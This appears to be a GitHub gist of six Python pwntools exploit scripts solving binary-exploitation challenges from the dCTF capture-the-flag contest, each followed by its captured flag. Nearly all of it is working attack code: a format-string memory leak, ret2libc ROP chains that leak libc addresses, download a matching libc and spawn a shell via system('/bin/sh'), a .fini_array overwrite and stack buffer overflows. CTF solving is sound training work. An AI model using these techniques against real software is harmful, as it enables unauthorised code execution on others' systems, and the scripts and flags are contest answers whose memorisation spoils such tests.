Last active
May 17, 2021 11:21
-
-
Save Error-200/3768f5b58776da1e0007e044aec99fae to your computer and use it in GitHub Desktop.
dCTF pwn xploits
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.log_level='critical' | |
| flag = b'' | |
| for i in range(20): | |
| p = remote('dctf-chall-readme.westeurope.azurecontainer.io', 7481) | |
| p.recvline() | |
| p.sendline('%'+str(i)+'$p') | |
| responce=p.recvline().decode().split() | |
| x = responce[1] | |
| try: | |
| res = p64(int(x, 16)) | |
| flag += res | |
| except Exception: | |
| pass | |
| print(flag) | |
| #ctf{n0w_g0_r3ad_s0me_b00k5} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| binary = context.binary = ELF('./baby_bof') | |
| context.log_level = 'INFO' | |
| if not args.REMOTE: | |
| context.log_file = 'local.log' | |
| libc = binary.libc | |
| p = process(binary.path) | |
| else: | |
| context.log_file = 'remote.log' | |
| p = remote('dctf-chall-baby-bof.westeurope.azurecontainer.io', 7481) | |
| rop = ROP([binary]) | |
| pop_rdi = rop.find_gadget(['pop rdi','ret'])[0] | |
| payload = 0x12 * b'A' | |
| payload += p64(pop_rdi) | |
| payload += p64(binary.got.puts) | |
| payload += p64(binary.plt.puts) | |
| payload += p64(binary.sym.vuln) | |
| p.sendlineafter("plz don't rop me\n",payload) | |
| p.recvline() | |
| _ = p.recv(6) | |
| puts = u64(_ + b'\0\0') | |
| log.info('puts: ' + hex(puts)) | |
| if not 'libc' in locals(): | |
| try: | |
| import requests | |
| r = requests.post('https://libc.rip/api/find', json = {'symbols':{'puts':hex(puts)[-3:]}}) | |
| libc_url = r.json()[0]['download_url'] | |
| libc_file = libc_url.split('/')[-1:][0] | |
| if not os.path.exists(libc_file): | |
| log.info('getting: ' + libc_url) | |
| r = requests.get(libc_url, allow_redirects=True) | |
| open(libc_file,'wb').write(r.content) | |
| except: | |
| log.critical('get libc yourself!') | |
| sys.exit(0) | |
| libc = ELF(libc_file) | |
| libc.address = puts - libc.sym.puts | |
| log.info('libc.address: ' + hex(libc.address)) | |
| payload = 0x12 * b'A' | |
| payload += p64(pop_rdi + 1) | |
| payload += p64(pop_rdi) | |
| payload += p64(libc.search(b'/bin/sh').__next__()) | |
| payload += p64(libc.sym.system) | |
| p.sendlineafter("plz don't rop me\n",payload) | |
| p.interactive() | |
| #dctf{D0_y0U_H4v3_A_T3mpl4t3_f0R_tH3s3} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| binary = context.binary = ELF('./hotel_rop') | |
| # context.log_level = 'DEBUG' | |
| if not args.REMOTE: | |
| context.log_file = 'local.log' | |
| libc = binary.libc | |
| p = process(binary.path) | |
| else: | |
| context.log_file = 'remote.log' | |
| p = remote('dctf1-chall-hotel-rop.westeurope.azurecontainer.io', 7480) | |
| p.recvuntil('Welcome to Hotel ROP, on main street ') | |
| _ = p.recvline().strip() | |
| main = int(_,16) | |
| binary.address = main - binary.sym.main | |
| log.info('binary.address: ' + hex(binary.address)) | |
| #0x000000000000140b: pop rdi; ret; | |
| rop = ROP([binary]) | |
| pop_rdi = rop.find_gadget(['pop rdi','ret'])[0] | |
| payload = 0x28 * b'A' | |
| payload += p64(pop_rdi) | |
| payload += p64(binary.got.puts) | |
| payload += p64(binary.plt.puts) | |
| payload += p64(binary.sym.vuln) | |
| p.sendlineafter("You come here often?\n",payload) | |
| p.recvline() | |
| _ = p.recv(6) | |
| puts = u64(_ + b'\0\0') | |
| log.info('puts: ' + hex(puts)) | |
| if not 'libc' in locals(): | |
| try: | |
| import requests | |
| r = requests.post('https://libc.rip/api/find', json = {'symbols':{'puts':hex(puts)[-3:]}}) | |
| libc_url = r.json()[0]['download_url'] | |
| libc_file = libc_url.split('/')[-1:][0] | |
| if not os.path.exists(libc_file): | |
| log.info('getting: ' + libc_url) | |
| r = requests.get(libc_url, allow_redirects=True) | |
| open(libc_file,'wb').write(r.content) | |
| except: | |
| log.critical('get libc yourself!') | |
| sys.exit(0) | |
| libc = ELF(libc_file) | |
| libc.address = puts - libc.sym.puts | |
| log.info('libc.address: ' + hex(libc.address)) | |
| payload = 0x28 * b'A' | |
| payload += p64(pop_rdi + 1) | |
| payload += p64(pop_rdi) | |
| payload += p64(libc.search(b'/bin/sh').__next__()) | |
| payload += p64(libc.sym.system) | |
| p.sendlineafter("You come here often?\n",payload) | |
| p.interactive() | |
| #dctf{ch41n_0f_h0t3ls} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| import signal | |
| binary = context.binary = ELF('./magic_trick') | |
| #p = process(binary.path,preexec_fn=lambda: signal.signal(signal.SIGALRM, signal.SIG_IGN)) | |
| p = remote('dctf-chall-magic-trick.westeurope.azurecontainer.io', 7481) | |
| #pause() | |
| p.sendlineafter('What do you want to write\n', str(binary.sym.win)) | |
| p.sendlineafter('Where do you want to write it\n',str(binary.get_section_by_name('.fini_array').header.sh_addr)) | |
| log.info(p.clean()) | |
| p.interactive() | |
| #dctf{1_L1k3_M4G1c} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| binary = context.binary = ELF('./pwn_sanity_check') | |
| #p = process(binary.path) | |
| p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io',7480) | |
| payload = b'' | |
| payload += b'A'* 24 | |
| payload += p64(0x1337c0de) | |
| # payload += p64(0xdeadc0de) | |
| p.recvline() | |
| p.sendlineafter('Am I dreaming?\n',payload) | |
| p.interactive() | |
| #dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| binary = context.binary = ELF('./pwn_sanity_check') | |
| #p = process(binary.path) | |
| p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io',7480) | |
| rop = ROP([binary]) | |
| pop_rdi = next(binary.search(asm('pop rdi; ret'))) | |
| pop_rsi_r15 = next(binary.search(asm('pop rsi; pop r15; ret'))) | |
| payload = b'' | |
| payload += b'A'* 72 | |
| payload += p64(pop_rdi) | |
| payload += p64(0xdeadbeef) | |
| payload += p64(pop_rsi_r15) | |
| payload += p64(0x1337c0de) | |
| payload += p64(0) | |
| payload += p64(binary.sym.win) | |
| p.sendlineafter('tell me a joke\n',payload) | |
| p.interactive() | |
| #dctf{Ju5t_m0v3_0n} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment